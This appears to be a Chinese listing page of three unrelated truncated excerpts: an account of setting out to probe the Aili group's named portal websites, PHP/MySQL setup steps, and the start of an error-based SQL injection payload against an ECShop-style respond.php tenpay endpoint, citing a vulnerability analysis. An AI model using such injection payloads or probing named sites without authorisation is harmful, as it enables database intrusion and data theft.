话说某天找dede模板，看到爱丽网模板很华丽很火，遂萌生检测念头，以下内容为记： 爱丽国际集团下有很多大型的门户类行业网站，据初步检测包括：aili.com、27.cn、qilincar.com(爱丽国际旗下麒麟车讯网)、533.com(533出国留学网)、9718.com(爱丽摄影团)、www.aimabz.com/www.86gw.com(北京婚庆网)、www.hongxiutuan.net(…

1、首先要确保你的apache正常运行，使用下面的代码看看能否正常显示。 <?php   echo phpinfo();   ?> 2、确保Mysql已经正常启动 3、在PHP的文件夹中建立一个文件夹temp，并复制该文件夹真实路径，我的完整的路径是：E:/www/php-5.2.14-Win32/temp 4、在E:/www/php-5.2.14-Win32文件夹中找到php.ini…

原漏洞分析：http://www.hackline.net/a/news/ldfb/web/2011/0105/7877.html respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7…